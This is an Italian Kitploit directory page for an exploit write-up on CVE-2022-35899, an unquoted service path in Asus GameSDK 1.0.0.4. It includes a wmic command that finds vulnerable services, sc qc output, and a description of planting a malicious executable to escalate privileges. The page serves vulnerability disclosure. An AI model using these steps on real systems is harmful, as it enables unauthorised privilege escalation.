Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-35899 — Percorso di servizio non quotato Asus GameSdk | Kitploit
Strumenti/GitHubGitHub/angelopioamirante/cve-2022-35899
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitConfigurazione Errata
GitHubangelopioamirante/cve-2022-35899

CVE-2022-35899

Percorso di servizio non quotato Asus GameSdk

Vedi Repository
34 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-35899

Percorso di servizio non quotato Asus GameSDK

Titolo Exploit: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Percorso di servizio non quotato (Escalation dei privilegi)

Data: 14/07/2022

Autore Exploit: Angelo Pio Amirante

Versione: 1.0.0.4

Testato su: Windows 10

Versione corretta: 1.0.5.0

Passaggi per scoprire il percorso di servizio non quotato:

root@kitploit:~
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Informazioni sul servizio:

root@kitploit:~
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

Exploit

Se un utente malintenzionato ha già compromesso il sistema e l'utente corrente dispone dei privilegi per scrivere nella cartella "C:\Program Files (x86)\ASUS" o in "C:", potrebbe inserire i propri file "Program.exe" o "GameSDK.exe" rispettivamente e, all'avvio del servizio, verrebbe lanciato il file dannoso invece del file "GameSDK.exe" originale.

Impatto

Un utente malintenzionato può elevare i propri privilegi sul sistema.

Video POC

https://youtu.be/u_8JMIgn-5g

Scarica lo strumento